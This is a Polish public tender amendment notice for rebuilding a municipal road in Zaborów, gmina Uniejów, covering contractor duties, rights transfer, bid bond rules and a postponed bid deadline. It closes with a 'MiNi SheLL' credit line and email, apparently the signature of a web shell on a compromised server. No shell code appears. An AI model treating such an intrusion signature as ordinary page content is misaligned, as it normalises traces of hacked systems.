16.	Zamawiający posiada decyzję o pozwoleniu na wykonanie zjazdu publicznego na drogę powiatową oraz decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia.
17.	Dokumentacja projektowa określona powyżej musi być zgodna z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r.  w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno – użytkowego i muszą zawierać wszystkie elementy określone danym rozporządzeniem. 
18.	Do prawidłowej realizacji przedmiotu zamówienia Wykonawca zobowiązany jest uzyskać wszystkie wymagane uzgodnienia formalno – prawne i decyzje administracyjne (pozwolenia, uzgodnienia, opinie) zezwalające na realizację robót budowlanych dla danego zadania.
19.	Wykonawca zobowiązany jest do dostosowania przedmiotu zamówienia do stanu prawnego obowiązującego w dniu przekazania opracowań Zamawiającemu, jeżeli w czasie wykonywania opracowań akty prawne ulegną zmianie.
20.	Wykonawca zobowiązany jest uzyskać wszelkie wymagane uzgodnienia, materiały oraz informacje niezbędne do prawidłowej realizacji przedmiotu zamówienia na własny koszt. 
21.	Wykonawca będzie zobowiązany zapewnić nadzór autorski nad robotami budowlanymi przeprowadzanymi w oparciu o sporządzoną dokumentację projektową polegającym na minimum cotygodniowej wizycie na terenie prowadzonych robót budowlanych. 
22.	W ramach przedmiotu zamówienia Wykonawca zobowiązany jest przedłożyć wersje papierowe:
22.1.	Projekt budowlano – wykonawczy w ilości 7 egzemplarzy 
22.2.	Przedmiar, kosztorys nakładczy, kosztorys inwestorski w ilości 2 egzemplarzy
22.3.	Specyfikacje techniczne wykonania i odbioru robót w ilości 2 egzemplarzy
22.4.	Pozostałą dokumentację wymaganą przepisami prawa
23.	Projekt budowlany powinien zawierać projekt stałej organizacji ruchu.
24.	Wersje elektroniczne powyższych opracowań należy dostarczyć w ilości 2 egzemplarzy w formatach: teksty w formacie .doc, rysunki w formacie .dwg, kosztorysy w formacie .xls. Wszystkie wersje elektroniczne Wykonawca dostarczy dodatkowo w formacie .pdf.
25.	Dokumentacja projektowa powinna:
25.1.	Umożliwić realizację inwestycji w formie „zaprojektuj i wybuduj” z uwzględnieniem przepisów ustaw prawo zamówień publicznych
25.2.	W swojej treści określić przedmiot zamówienia, w szczególności technologię robót, materiały i urządzenia, parametry techniczne i funkcjonalne przyjętych rozwiązań materiałowych, wybranej technologii, urządzeń i wyposażenia
25.3.	Opisywać przedmiot zamówienia za pomocą cech technicznych i jakościowych, przy przestrzeganiu Polskich Norm przenoszących europejskie normy zharmonizowane
26.	Roboty budowlane stanowić będą całość praz związanych z przebudową drogi gminnej, określoną w opisie przedmiotu zamówienia, na podstawie sporządzonej dokumentacji projektowej – projektu budowlano – wykonawczego, zgodnie ze specyfikacją techniczną wykonania i odbioru robót, pozwoleniem na budowę (zgłoszeniem robót) oraz zgodnie z obowiązującymi przepisami. 
27.	Przed przystąpieniem do wyceny robót zaleca się dokonania wizji lokalnej w terenie.
28.	Przedmiary załączone do postępowania należy traktować pomocniczo. 
29.	Dokumentację projektową należy wykonać na podstawie PFU wraz z załącznikami dołączonymi do niniejszej SIWZ oraz zgodnie z opisem przedmiotu zamówienia. 
30.	Roboty budowlane należy wykonać zgodnie z opracowanymi przez Wykonawcę projektami budowlanymi i wykonawczymi zatwierdzonymi przez Zamawiającego i inspektora Nadzoru.
31.	Program funkcjonalno – wykonawczy dołączony do niniejszej SIWZ nie jest projektem budowlanym. Obejmuje jedynie zbiór wytycznych oraz kwestii istotnych dla Zamawiającego stanowiącymi podstawę do jego opracowania. 
32.	Zmiany dokonywane w dokumentacji projektowej sporządzanej przez Wykonawcę nie stanowią zmian umowy z Zamawiającym w ramach danego zadania, o ile nie naruszają założeń stanowiących podstawę do opisu  przedmiotu zamówienia.
33.	Dokumentacja dołączona do SIWZ i opisu przedmiotu zamówienia służy do ustalenia planowanych kosztów prac projektowych i robót budowlanych w celu sporządzenia ceny oferty.
34.	Wykonawca nie może domagać się podwyższenia wynagrodzenia stanowiącego przedmiot oferty ze względu ma zwiększenie zakresu prac do realizacji, który to zakres zostanie określony po szczegółowej analizie przedmiotu zamówienia w ramach realizowanej dokumentacji projektowej. 
35.	Po wyborze oferty, przed podpisaniem umowy Oferent przedłoży kosztorys ofertowy, na podstawie którego skalkulował cenę oferty. 
36.	Wykonawca zobowiązany jest utrzymywać porządek na terenie budowy, na bieżąco i systematycznie likwidować wszelkie zagrożenia. 
37.	Wykonawca zamówienia musi przewidzieć wszystkie okoliczności, które mogą wpłynąć na cenę zamówienia. W związku z powyższym wymagane jest od oferentów bardzo szczegółowe sprawdzenie warunków wykonania zamówienia. 
38.	Roboty budowlane należy wykonać zgodnie z obowiązującymi normami, sztuką budowlaną, przepisami BHP, ppoż. oraz poleceniami inspektora nadzoru inwestorskiego.
39.	Wykonawca po wykonaniu robót przygotuje wszelkie wymagane dokumenty do przedstawienia dla organu nadzoru budowlanego w celu zgłoszenia zakończenia robót, w tym dokumentację powykonawczą.
40.	Wykonawca dostarczy Zamawiającemu operat kolaudacyjny zawierający dodatkowo oświadczenie o złożeniu w Ośrodku Geodezjno – Kartograficznym inwentaryzacji geodezyjnej powykonawczej.
41.	 Wykonawca w terminie 2 miesięcy od dnia zakończenia realizacji robót zobowiązany jest przekazać Zamawiającemu zarejestrowaną w państwowym zasobie geodezyjno – kartograficznym inwentaryzacją geodezyjną powykonawczą.
42.	Wykonawca zobowiązany jest dostarczyć Zamawiającemu przy odbiorze robót (w dniu podpisania protokołu odbioru końcowego przedmiotu zamówienia) kosztorys powykonawczy z realizacji przedsięwzięcia. Kosztorys powykonawczy stanowi załącznik do protokołu odbioru końcowego przedmiotu zamówienia. 
43.	Zamawiający zgodnie z art. 29 ust. 3 ustawy Pzp informuje, że jeżeli w SIWZ i jej załącznikach wskazane zostały znaki towarowe, patenty, pochodzenie materiałów lub urządzeń, nazwy ich producentów i dystrybutorów, nazwy własne produktów, pochodzenie urządzeń itd. mają one charakter przykładowy. Zostały one bowiem określone jedynie w celu sprecyzowania parametrów i wymogów techniczno-użytkowych przedmiotu zamówienia. 
44.	Zamawiający dopuszcza składanie ofert materiałowo i technologicznie równoważnych. Zaoferowanie rozwiązań równoważnych nie może prowadzić do zdefiniowania nowego, w kluczowych elementach niezgodnego z dokumentacją projektową, opisu zamówienia.
45.	Zgodnie z art. 30 ust. 5 ustawy Pzp Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego materiały czy urządzenia spełniają wymagania określone przez Zamawiającego. W związku z powyższym, w przypadku zaoferowania materiałów i urządzeń równoważnych do materiałów i urządzeń określonych w dokumentacji, Wykonawca zobowiązany jest załączyć do oferty szczegółowy opis oferowanych materiałów i urządzeń wskazując, że zaproponowane rozwiązania są równoważne pod względem technicznym, jakościowym i funkcjonalnym. Nie wykazanie materiałów i urządzeń równoważnych traktowane będzie, jako deklaracja zastosowania materiałów i urządzeń wymienionych w dokumentacji projektowej.
46.	Zaleca się oferentom szczegółowe zapoznanie się z treścią Specyfikacji Istotnych Warunków Zamówienia, dokonanie wizji lokalnej w terenie, zdobycie wszelkich informacji niezbędnych do prawidłowego przygotowania oferty oraz sprawdzenie i zweryfikowanie dokumentacji oraz niezwłocznego poinformowania Zamawiającego o ewentualnych błędach i przeoczeniach.
47.	Wykonawca nie może wykorzystywać błędów lub braków w programie funkcjonalno – użytkowym, a o ich wykryciu winien natychmiast powiadomić Zamawiającego, który dokona odpowiednich zmian lub poprawek.
48.	Wykonawca zobowiązany jest konsultować z Zamawiającym wszystkie założenia i rozwiązania projektowane w dokumentacji. 
49.	Dokumentacje projektowe muszą być sporządzone zgodnie z obowiązującymi przepisami prawa, w szczególności:
49.1.	Ustawa prawo budowlane
49.2.	Ustawa o wyrobach budowlanych
49.3.	Rozporządzenie Ministra transportu i Gospodarki Morskiej w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie
49.4.	Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej w sprawie szczegółowego zakresu i formy projektu budowlanego
50.	Przedmiot zamówienia jest współfinansowany ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014-2020
51.	Wykonawca przeniesie na Zamawiającego autorskie prawa majątkowe i prawa zależne do wszelkich egzemplarzy sporządzonych opracowań na wszystkich polach eksploatacji wymienionych w art. 50 ustawy o prawie autorskim i prawach pokrewnych. W szczególności Wykonawca przeniesie na Zamawiającego autorskie prawo majątkowe do utworu, na następujących polach eksploatacji:
a)	autorskie prawa majątkowe do wszystkich utworów w rozumieniu ustawy o Prawie autorskim i prawach pokrewnych wytworzonych w trakcie realizacji przedsięwzięcia, w szczególności takich jak: raporty, mapy, wykresy, rysunki, plany, dane statystyczne, ekspertyzy, obliczenia inne dokumenty powstałe przy realizacji przedsięwzięcia oraz broszury, zwanych dalej utworami;
b)	Zezwala Zamawiającemu na korzystanie z opracowań utworów oraz ich przeróbek oraz na rozporządzanie tymi opracowaniami wraz z przeróbkami - tj. udziela Zamawiającemu praw zależnych.
- użytkowania  utworów na własny użytek, użytek swoich jednostek organizacyjnych oraz użytek osób trzecich w celach związanych z realizacją zadań Zamawiającego,
- utrwalenie utworów na wszelkich rodzajach nośników, a w szczególności na nośnikach video, taśmie światłoczułej, magnetycznej, dyskach komputerowych oraz wszystkich typach nośników przeznaczonych do zapisu cyfrowego (np. CD, DVD, Blue-ray, pendrive, itd.),
- zwielokrotnianie utworów dowolną techniką w dowolnej ilości, w tym techniką magnetyczną na kasetach video, techniką światłoczułą i cyfrową, techniką zapisu komputerowego na wszystkich rodzajach nośników dostosowanych do tej formy zapisu, wytwarzanie jakąkolwiek techniką egzemplarzy utworu, w tym techniką drukarską, reprograficzną, zapisu magnetycznego oraz techniką cyfrową,
- wprowadzania utworów do pamięci komputera na dowolnej liczbie stanowisk komputerowych oraz do sieci multimedialnej, telekomunikacyjnej, komputerowej, w tym do Internetu,
- wyświetlanie i publiczne odtwarzanie utworu,
- nadawanie całości lub wybranych fragmentów utworu za pomocą wizji albo fonii przewodowej i bezprzewodowej przez stację naziemną,
- nadawanie za pośrednictwem satelity,
- reemisja,
- wymiana nośników, na których utwór utrwalono,
- wykorzystanie w utworach multimedialnych,
- wykorzystywanie całości lub fragmentów utworu co celów promocyjnych i reklamy,
- wprowadzanie zmian, skrótów,
- sporządzenie wersji obcojęzycznych, zarówno przy użyciu napisów, jak i lektora,
- publiczne udostępnianie utworu w taki sposób, aby każdy mógł mieć do niego dostęp w miejscu i w czasie przez niego wybranym
- Prawo do przeniesienia autorskich praw majątkowych i praw zależnych na podmiot trzeci
- rozpowszechnianie przez prezentację lub publikację w całości lub we fragmentach, na wystawie, w katalogach, wydawnictwach promujących inwestycje lub Zamawiającego, w mediach, na spotkaniach, konferencjach i na stronach internetowych;
- możliwości reprodukcji i publikacji utworu w całości lub we fragmentach za pomocą dowolnej techniki;
- użyczanie, najmowanie, wprowadzanie do obrotu;
- prawa do opracowania utworu w szczególności jego przeróbki lub adaptacji;
- sporządzanie projektów na podstawie utworu;
- prawa do wykonywania robót budowlanych i innych prac sporządzonych na podstawie utworu
- wykorzystywanie do opracowania wniosków o dofinansowanie 
- przetwarzanie, wprowadzanie zmian, poprawek i modyfikacji
- udostępnianie wykonawcom, w tym również wykonanych kopii
- wykorzystywanie wielokrotne utworu do realizacji celów, zadań i inwestycji Zamawiającego;
- wyświetlanie i publiczne odtwarzanie utworu
52.	Wynagrodzenie za przeniesienie autorskich praw majątkowych zostanie zawarte w wynagrodzeniu ryczałtowym.
53.	Zamawiający samodzielnie lub na polecenie Inspektora Nadzoru Inwestorskiego może zlecić wykonanie badań laboratoryjnych polegających na weryfikacji poprawności wykonania poszczególnych warstw konstrukcyjnych. 
54.	Wykonawca zobowiązany jest w szczególności do:
54.1.	Uzgadniania z Zamawiającym wszystkie rozwiązania projektowe,
54.2.	Dostarczeniu Zamawiającemu dokumentacji budowlano – wykonawczej uzgodnionej ze wszystkimi instytucjami, których akceptacja jest wymagana przepisami prawa
54.3.	dostarczenia Zamawiającemu w dniu przekazania placu budowy oświadczenia o podjęciu obowiązków kierownika budowy potwierdzonych „za zgodność z oryginałem” przez Wykonawcę, kopii zaświadczeń o przynależności do właściwej izby samorządu zawodowego, potwierdzających wpis tej osoby na listę członków odpowiedniej izby oraz potwierdzonych „za zgodność z oryginałem” przez Wykonawcę kopii uprawnień budowlanych,
54.4.	zapewnienia kierowania robotami budowlanymi przez pracowników Wykonawcy, posiadających odpowiednie uprawnienia budowlane oraz kwalifikacje zawodowe,
54.5.	uzyskania każdorazowo akceptacji i zatwierdzenia przez Zamawiającego zmiany kierownika budowy w stosunku do osoby wskazanej w ofercie,
54.6.	uzyskania na własny koszt ubezpieczeń i zabezpieczeń należytego wykonania umowy,
54.7.	wykonania i ustawienia tablic informacyjnych wynikających z Prawa Budowlanego,
54.8.	oznaczenia terenu budowy, odpowiednie oznakowanie i zabezpieczenie miejsc prowadzenia robót zgodnie z obowiązującymi przepisami bhp,
54.9.	zagospodarowania terenu budowy i zaplecza socjalnego dla potrzeb własnych – zgodnie z obowiązującymi w tym zakresie przepisami, 
54.10.	utrzymania porządku na terenie budowy w czasie realizacji inwestycji,
54.11.	zgłaszania Inspektorowi nadzoru robót ulegających zakryciu lub zanikających,
54.12.	przeprowadzania niezbędnych badań laboratoryjnych,
54.13.	wywozu i utylizacji odpadów i gruzu.
55.	Kody Wspólnego Słownika Zamówień (CPV):
55.1.	Główny przedmiot: 45.00.00.00 – 7 Roboty budowlane
55.2.	Dodatkowe przedmioty: 45.23.31.40 – 2 Roboty drogowe
45.23.31.20 - 6 Roboty w zakresie budowy dróg 
45.10.00.00 – 8 Przygotowanie terenu pod budowę
45.23.31.41 - 9 Roboty w zakresie konserwacji dróg 
45.23.32.00 – 1 Roboty w zakresie różnych nawierzchni 
45.22.00.00 – 5 Roboty inżynieryjne i budowlane
71.32.00.00 – 7 usługi inżynieryjne w zakresie projektowania
56.	Wykonawca udzieli gwarancji (minimum 60 miesięcy, maksymalnie 78 miesięcy) na wykonany przedmiot zamówienia. Gwarancja jest udzielana na warunkach określonych we wzorze umowy. Na okres gwarancji wykonawca wydłuża termin rękojmi.
57.	Zamawiający nie przewiduje zamówień, o których mowa w art.67 ust. 1 pkt 6 i 7 ustawy Pzp
58.	Części zamówienia Zamawiający nie dopuszcza składanie ofert częściowych. 
</ma></cz_2><cz_3><miejsce_sekcja>IV</miejsce_sekcja><miejsce>IV.1.2)</miejsce><jest>Informacja na temat wadium: Zamawiający wymaga wniesienia wadium przed upływem terminu składania ofert określonego w niniejszej SIWZ 1. Wadium należy wnieść w wysokości 10 000,00 zł 2. Wadium może być wniesione w pieniądzu, w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym oraz w gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j.: Dz. U. z 2016 r. Nr 359) 3. Wadium wnoszone w pieniądzu należy wpłacić wyłącznie przelewem na rachunek bankowy Zamawiającego: 14 8557 0009 2005 0200 0130 0001 w takim terminie, aby najpóźniej przed upływem terminu składania ofert - określonym w pkt XI SIWZ - środki finansowe z tytułu wadium znajdowały się na wskazanym wyżej rachunku Zamawiającego. Zamawiający stwierdzi wniesienie wadium na podstawie informacji banku prowadzącego w/w rachunek. 4. Wadium wniesione w innej formie niż pieniężna należy złożyć w oryginale w kasie Urzędu Miasta w Uniejowie przed upływem terminu składania ofert w kopercie oznaczonej w następujący sposób: ”Wadium - przetarg na wykonanie robót budowlanych dla zadnia: „Przebudowa drogi gminnej w miejscowości Zaborów, gm. Uniejów” nie otwierać przed 06.02.2017 godz. 10:30. 5. Gwarancja bankowa lub ubezpieczeniowa, stanowiąca formę wniesienia wadium, winna spełniać co najmniej następujące wymogi (pod rygorem wykluczenia wykonawcy): a) ustalać beneficjenta gwarancji, tj. Gminę Uniejów b) określać kwotę gwarantowaną w zł (ustaloną w SIWZ) c) określać termin ważności (wynikający z SIWZ) d) być gwarancją nieodwoływalną, bezwarunkową, płatną na każde żądanie. Uwaga! Z treści gwarancji bankowej lub ubezpieczeniowej powinno wynikać uprawnienie Zamawiającego do zatrzymania wadium, jeżeli wystąpią przesłanki opisane w art. 46 ust. 4a i 5 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych), w szczególności uprawnienie Zamawiającego do zatrzymania wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3 a, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń potwierdzających okoliczności, o których mowa w art. 25a ust. 1, pełnomocnictw, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 6. Do wadium wniesionego w formie poręczenia wymagania opisane w pkt. 5 stosuje się odpowiednio 7. W przypadku nie wniesienia wadium na warunkach określonych w pkt. 1-4 Wykonawca zostanie wykluczony z dalszego postępowania, a złożona przez niego oferta zostanie odrzucona. 8. Zwrot wadium nastąpi na zasadach określonych w art. 46 ustawy Prawo zamówień publicznych Oferent zobowiązany jest podać w ofercie dokładną informację odnośnie zwrotu wadium tj. adres banku, numer konta itp.</jest><ma>Informacja na temat wadium: Zamawiający wymaga wniesienia wadium przed upływem terminu składania ofert określonego w niniejszej SIWZ 1. Wadium należy wnieść w wysokości 10 000,00 zł 2. Wadium może być wniesione w pieniądzu, w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym oraz w gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j.: Dz. U. z 2016 r. Nr 359) 3. Wadium wnoszone w pieniądzu należy wpłacić wyłącznie przelewem na rachunek bankowy Zamawiającego: 14 8557 0009 2005 0200 0130 0001 w takim terminie, aby najpóźniej przed upływem terminu składania ofert - określonym w pkt XI SIWZ - środki finansowe z tytułu wadium znajdowały się na wskazanym wyżej rachunku Zamawiającego. Zamawiający stwierdzi wniesienie wadium na podstawie informacji banku prowadzącego w/w rachunek. 4. Wadium wniesione w innej formie niż pieniężna należy złożyć w oryginale w kasie Urzędu Miasta w Uniejowie przed upływem terminu składania ofert w kopercie oznaczonej w następujący sposób: ”Wadium - przetarg na wykonanie robót budowlanych dla zadnia: „Przebudowa drogi gminnej w miejscowości Zaborów, gm. Uniejów” nie otwierać przed 08.02.2017 godz. 10:30. 5. Gwarancja bankowa lub ubezpieczeniowa, stanowiąca formę wniesienia wadium, winna spełniać co najmniej następujące wymogi (pod rygorem wykluczenia wykonawcy): a) ustalać beneficjenta gwarancji, tj. Gminę Uniejów b) określać kwotę gwarantowaną w zł (ustaloną w SIWZ) c) określać termin ważności (wynikający z SIWZ) d) być gwarancją nieodwoływalną, bezwarunkową, płatną na każde żądanie. Uwaga! Z treści gwarancji bankowej lub ubezpieczeniowej powinno wynikać uprawnienie Zamawiającego do zatrzymania wadium, jeżeli wystąpią przesłanki opisane w art. 46 ust. 4a i 5 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych), w szczególności uprawnienie Zamawiającego do zatrzymania wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3 a, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń potwierdzających okoliczności, o których mowa w art. 25a ust. 1, pełnomocnictw, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 6. Do wadium wniesionego w formie poręczenia wymagania opisane w pkt. 5 stosuje się odpowiednio 7. W przypadku nie wniesienia wadium na warunkach określonych w pkt. 1-4 Wykonawca zostanie wykluczony z dalszego postępowania, a złożona przez niego oferta zostanie odrzucona. 8. Zwrot wadium nastąpi na zasadach określonych w art. 46 ustawy Prawo zamówień publicznych Oferent zobowiązany jest podać w ofercie dokładną informację odnośnie zwrotu wadium tj. adres banku, numer konta itp.</ma></cz_3><cz_4><miejsce_sekcja>IV</miejsce_sekcja><miejsce>IV.6.2)</miejsce><jest>Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: Data: 06/02/2017, godzina: 10:15</jest><ma>Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: Data: 08/02/2017, godzina: 10:15</ma></cz_4><cz_5><miejsce_sekcja>IV</miejsce_sekcja><miejsce>IV.6.6)</miejsce><jest>Informacje dodatkowe: Miejsce i termin otwarcia ofert: Otwarcie ofert nastąpi w dniu 06.02.2017 r., godz. 10:30 w pokoju nr 4 Urzędu Miasta w Uniejowie . W przypadku braku możliwości otwarcia ofert w pokoju nr 4, nastąpi ono w innym pomieszczeniu Urzędu Miasta w Uniejowie, o czym komisja przetargowa poinformuje przybyłych wykonawców. Otwarcie ofert jest jawne i nastąpi bezpośrednio po podaniu kwoty, jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia. Po otwarciu ofert przekazane zostaną następujące informacje: nazwa i siedziba wykonawcy, którego oferta jest otwierana, cena, termin wykonania zamówienia, okres gwarancji i warunki płatności. </jest><ma>Informacje dodatkowe: Miejsce i termin otwarcia ofert: Otwarcie ofert nastąpi w dniu 08.02.2017 r., godz. 10:30 w pokoju nr 4 Urzędu Miasta w Uniejowie . W przypadku braku możliwości otwarcia ofert w pokoju nr 4, nastąpi ono w innym pomieszczeniu Urzędu Miasta w Uniejowie, o czym komisja przetargowa poinformuje przybyłych wykonawców. Otwarcie ofert jest jawne i nastąpi bezpośrednio po podaniu kwoty, jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia. Po otwarciu ofert przekazane zostaną następujące informacje: nazwa i siedziba wykonawcy, którego oferta jest otwierana, cena, termin wykonania zamówienia, okres gwarancji i warunki płatności. </ma></cz_5></zmiany><dodane><cz_2><miejsce>III1.3)</miejsce><dodac>Zamawiający dopuszcza dysponowanie przez Wykonawcę jedną osobą pełniącą funkcję projektanta i kierownika budowy pod warunkiem spełnienia wymagań określonych w podpunkcie c.3) niniejszego rozdziału. </dodac></cz_2></dodane></ZP-406>

Creat By MiNi SheLL
Email: jattceo@gmail.com